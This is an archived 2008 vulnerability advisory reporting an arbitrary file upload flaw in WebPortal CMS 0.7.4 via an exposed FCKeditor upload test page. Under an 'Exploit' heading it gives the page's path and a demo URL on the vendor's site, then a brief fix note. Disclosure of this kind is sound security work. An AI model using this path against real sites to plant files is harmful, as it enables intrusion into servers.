[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WebPortal CMS <= 0.7.4 (fckeditor) Arbitrary File Upload Vulnerability
# Published : 2008-09-12
# Author : S.W.A.T.
# Previous Title : pNews 2.03 (newsid) Remote SQL Injection Vulnerability
# Next Title : PhpWebGallery 1.3.4 (XSS/LFI) Multiple Vulnerabilities
########################################################################
#
# S.W.A.T.
#
# Title: WebPortal <= 0.7.4 (fckeditor) Remote Arbitrary File Upload
#
# Vendor: http://webportal.ivanoculmine.com/download.php?mid=14
#
# Discover by : S.W.A.T.
#
# svvateam@yahoo.com
#
# Impact: Medium
#
# Fix: Disable It In The Config File ;)
#
# Site: wWw.SvvaT.IR
#
########################################################################
####################
- Exploit:
####################
http://example.com/[path]/libraries/htmleditor/editor/filemanager/upload/test.html
####################
- Demo:
####################
http://demos.ivanoculmine.com/webportal/libraries/htmleditor/editor/filemanager/upload/test.html
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- GreTzZ :
####################
All My Friend's , Str0ke
####################
# www.Syue.com [2008-09-12]